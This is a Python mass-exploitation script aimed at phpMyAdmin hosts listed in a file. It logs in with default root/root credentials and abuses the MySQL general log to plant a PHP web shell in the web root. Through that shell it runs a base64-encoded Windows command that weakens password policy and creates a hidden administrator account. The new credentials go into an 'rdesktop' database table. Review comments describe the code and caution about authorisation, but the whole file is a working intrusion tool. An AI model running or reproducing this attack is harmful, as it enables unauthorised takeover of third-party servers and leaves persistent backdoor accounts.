import re
import time
import base64
import string
import random
import pymysql
import datetime
import requests
from bs4 import BeautifulSoup
def get_ip_list() -> list[str]:
    """Return the raw lines of ``ip.txt`` from the current working directory.

    Each entry keeps its trailing newline; ``main`` strips them. Raises
    ``FileNotFoundError`` when the file is missing (nothing catches it here).
    """
    with open('ip.txt', 'r') as handle:
        return handle.readlines()
def get_token(ip: str):
    """Fetch the phpMyAdmin index page for ``ip`` and scrape its request token.

    Returns ``(url, token, cookie_1)``: the index URL that was requested, the
    value found between ``token=`` and ``" t`` in the HTML, and the pre-login
    cookie jar from that response.

    Raises whatever ``requests.get`` raises (connection error, the 1-second
    timeout) and ``AttributeError`` when the pattern is not found, because
    ``re.search`` returns ``None`` and ``.group()`` is called unconditionally.
    ``main`` catches both with its broad ``except`` and moves to the next host.

    NOTE(review): this contacts a remote host over plain HTTP. Only run it
    against systems you are explicitly authorised to test.
    """
    url = 'http://'+ip+'/phpmyadmin/index.php'
    # Very short timeout: slow or filtered hosts raise and are skipped upstream.
    y = requests.get(url,timeout = 1)
    # Greedy, unanchored pattern; the slice drops the leading 'token=' (6 chars)
    # and the trailing '" t' (3 chars). If more than one 'token=' precedes the
    # matched '" t' the greedy match spans them all and the result is garbage;
    # ``main`` only sanity-checks the length (32) afterwards.
    token = re.search('token=.*" t',y.text).group()[6:-3]
    cookie_1 =y.cookies
    return url,token,cookie_1
def login(url, token, cookie_1):
    """POST the hard-coded credentials ``root``/``root`` to the phpMyAdmin login form.

    ``token`` and ``cookie_1`` come from ``get_token`` so the request carries the
    session the token belongs to. Redirects are disabled so the post-login
    ``Set-Cookie`` headers end up in ``r.cookies`` instead of being consumed by a
    redirect hop.

    Returns the response cookie jar when the login form is absent from the
    body, ``False`` otherwise. Note this is a heuristic, not a status-code
    check: any response that lacks ``name="login_form"`` (an error page, a
    WAF block page) is reported as a successful login.
    """
    # 'server' is sent as '1 ' with a trailing space — kept as-is since it is
    # part of the request body; presumably tolerated by the target's int cast.
    payload = {'pma_username': 'root', 'pma_password': 'root','server':'1 ','lang':'zh_CN','token':token}
    r = requests.post(url,data=payload,cookies = cookie_1,allow_redirects=False)
    cookie_2 = r.cookies
    if 'name="login_form"' not in r.text:
        # Message: "logged in with the default password".
        print('使用默认密码登录成功!')
        return cookie_2
    else:
        # Message: "login failed".
        print('登录失败!')
        return False
def get_cookie(cookie_1, cookie_2):
    """Merge two cookie jars into one; ``cookie_2`` wins on duplicate names.

    ``cookie_1`` is the pre-login jar and ``cookie_2`` the post-login jar, so
    any cookie re-issued at login overrides its earlier value. The merge goes
    through plain ``name -> value`` dicts, so domain/path scoping of the
    original cookies is not carried over. Returns a fresh jar.
    """
    merged = {}
    merged.update(requests.utils.dict_from_cookiejar(cookie_1))
    merged.update(requests.utils.dict_from_cookiejar(cookie_2))
    return requests.utils.cookiejar_from_dict(merged)
def execute_sql(token: str, ip: str, cookies):
    """Abuse the MySQL general log on ``ip`` to write a PHP file, then run a command through it.

    What the visible code does, in order:
      1. ``select @@datadir`` via phpMyAdmin's ``import.php`` and derive a path
         ``.../www/phpinfo.php`` from it (``get_path``).
      2. Point ``general_log_file`` at that path and switch ``general_log`` on,
         so every subsequent query is appended to the .php file (``create_file``).
      3. ``select`` a string containing PHP that base64-decodes and executes a
         Windows command with backticks. The command writes a ``secedit``
         template that sets ``PasswordComplexity = 0``, applies it, creates a
         local user with a random name/password, adds it to ``administrators``,
         prints ``GetSuccess!`` and deletes its own artefacts including the php
         file (``generate_random_exp``).
      4. GET ``/phpinfo.php`` and treat ``GetSuccess!`` in the body as success
         (``check_exp``).
      5. Switch the general log off and rename its file (``delete``).

    Returns ``(user, pwd, ip)`` on success, ``False`` when ``check_exp`` finds
    no marker. Every helper is a closure over ``token``, ``ip``, ``cookies``.

    NOTE(review): this is an intrusion payload against a third-party host and
    leaves a persistent administrator account behind. It must not be run
    outside an explicitly authorised engagement.
    """
    sql_url = 'http://' + ip + '/phpmyadmin/import.php'
    # [0] path discovery, [1] enable logging, [2] disable logging + reset file.
    text = ['select @@datadir','SET GLOBAL general_log=ON',
    'set global general_log=off;set global general_log_file="MYSQL.log";']
    def modle(sql_text: str):
        """POST ``sql_text`` to import.php; print every <td> text and return the LAST one.

        ``result`` is only assigned inside the loop, so a response with no
        text-bearing <td> raises ``UnboundLocalError`` (swallowed by ``main``).
        """
        data = {'token': token, 'sql_query': sql_text}
        sql = requests.post(sql_url, data=data, cookies=cookies)
        soup = BeautifulSoup(sql.text, 'lxml')
        tag = soup.find_all('td')
        for i in tag:
            if i.string:
                print(i.string)
                result = i.string
        return result
    def get_path() -> str:
        """Turn the reported datadir into a ``.../www/phpinfo.php`` web-root path."""
        path = modle(text[0])
        # Greedy '.*M' keeps everything up to the LAST 'M' in the datadir, the
        # slice drops that 'M', backslashes become forward slashes and 'www/'
        # is appended. This presumably assumes a layout where the MySQL
        # directory and a 'www' web root are siblings — not verifiable here;
        # any datadir without an 'M' makes re.search return None and crash.
        path = re.search('.*M', path).group()[:-1].replace('\\','/')+'www/phpinfo.php'
        print(path)
        return path
    def create_file() -> None:
        """Redirect the general log to the PHP path and enable logging."""
        file_path = 'set global general_log_file ="'+ get_path()+'"'
        modle(file_path)
        print(file_path)
        modle(text[1])
    def random_str() -> str:
        """Return 8 distinct ASCII letters (``random.sample`` never repeats)."""
        # Local name deliberately shadows the function; it is only a value here.
        random_str = ''.join(random.sample(string.ascii_letters, 8))
        return random_str
    def generate_random_exp():
        """Log a PHP one-liner that runs the account-creation command; return (user, pwd)."""
        user = random_str() + '$'
        pwd = random_str()
        # NOTE(review): the triple-quoted literal embeds real newlines inside
        # the cmd string; whether the target shell tolerates them is not
        # verifiable from here.
        exp = '''echo [version] > 1.inf && echo signature="$CHICAGO$" >> 1.inf &&
echo [System Access] >> 1.inf && echo PasswordComplexity = 0 >> 1.inf && secedit
/configure /db temp.sdb /cfg 1.inf & net user ''' + user+ ' ' + pwd + ''' /add & net
localgroup administrators ''' + user + ''' /add && echo GetSuccess! & del 1.inf
temp.sdb phpinfo.php && echo DeleteSuccess! '''
        # Base64 keeps quotes/backslashes out of the SQL and the PHP source.
        exp_base64 = base64.b64encode(exp.encode('utf-8')).decode('utf-8')
        # The SELECT result is irrelevant; the query text itself is what lands
        # in the log file and therefore in phpinfo.php.
        exp_code = '''select '<?php $str ="''' + exp_base64 + '''"; $code = base64_decode($str)
;echo `$code`;?>';'''
        modle(exp_code)
        return user, pwd
    def check_exp():
        """GET /phpinfo.php on the target; return ``ip`` if the success marker is present, else None."""
        url_2 = 'http://' + ip + '/phpinfo.php'
        # No timeout here, unlike get_token — a hung target blocks the whole run.
        check = requests.get(url_2)
        # The sleep comes AFTER the response has already been received, so it
        # delays nothing useful.
        time.sleep(5)
        print(check.text)
        if 'GetSuccess!' in check.text:
            print('Success !!!')
            return ip
        else:
            print('Failed !')
    def delete() -> None:
        """Turn the general log off and point it at a relative 'MYSQL.log'."""
        modle(text[2])
    create_file()
    user,pwd = generate_random_exp()
    if check_exp() is None:
        # Logging is left ENABLED on the target when we bail out here.
        return False
    delete()
    return user,pwd,ip
def main() -> None:
    """Run the token → login → exploit chain for every host in ``ip.txt``, recording hits.

    Results go into an ``rdesktop`` table (``user``, ``pwd``, ``ip``, ``time``)
    on a MySQL server whose connection arguments are the literal placeholders
    ``'ip'``, ``'user'``, ``'pwd'``, ``'phpmyadmin'`` — they must be replaced
    before this does anything. Any exception for a host is printed and the loop
    continues; ``db.close()`` only runs if the loop itself completes.

    NOTE(review): the INSERT is built with ``%`` formatting. The values are
    locally generated letters plus a line from ip.txt, so the injection surface
    is the input file, but it should still be ``cursor.execute(sql, params)``
    with ``%s`` placeholders rather than string interpolation.
    """
    db = pymysql.Connect('ip', 'user', 'pwd', 'phpmyadmin')
    cursor = db.cursor()
    # Not inside the try: a missing ip.txt raises straight out and skips db.close().
    ip_list =get_ip_list()
    for ip in ip_list:
        try:
            ip = ip.strip()
            url, token, cookie_1 = get_token(ip)
            print(ip)
            # Only sanity check on the scraped token; message: "token error".
            if len(token) != 32:
                print('token 错误!')
                continue
            cookie_2 = login(url, token, cookie_1)
            if cookie_2 is False:
                continue
            cookies = get_cookie(cookie_1, cookie_2)
            # execute_sql returns False on failure; unpacking a bool raises
            # TypeError, which the broad except below turns into a printed line.
            user, pwd, ip = execute_sql(token, ip, cookies)
            if user and pwd and ip:
                # Drop the microseconds from the ISO-ish timestamp.
                time_now = str(datetime.datetime.now())[:-7]
                sql = "insert into rdesktop (user,pwd,ip,time) VALUES ('%s','%s','%s','%s')" % (user,pwd,ip,time_now)
                print(sql)
                cursor.execute(sql)
                db.commit()
            else:
                continue
        except Exception as e:
            # Catch-all keeps the scan going; the error is only printed.
            print(e)
    db.close()
if __name__ == "__main__":
    # Script entry point: only run the scan when executed directly, not on import.
    main()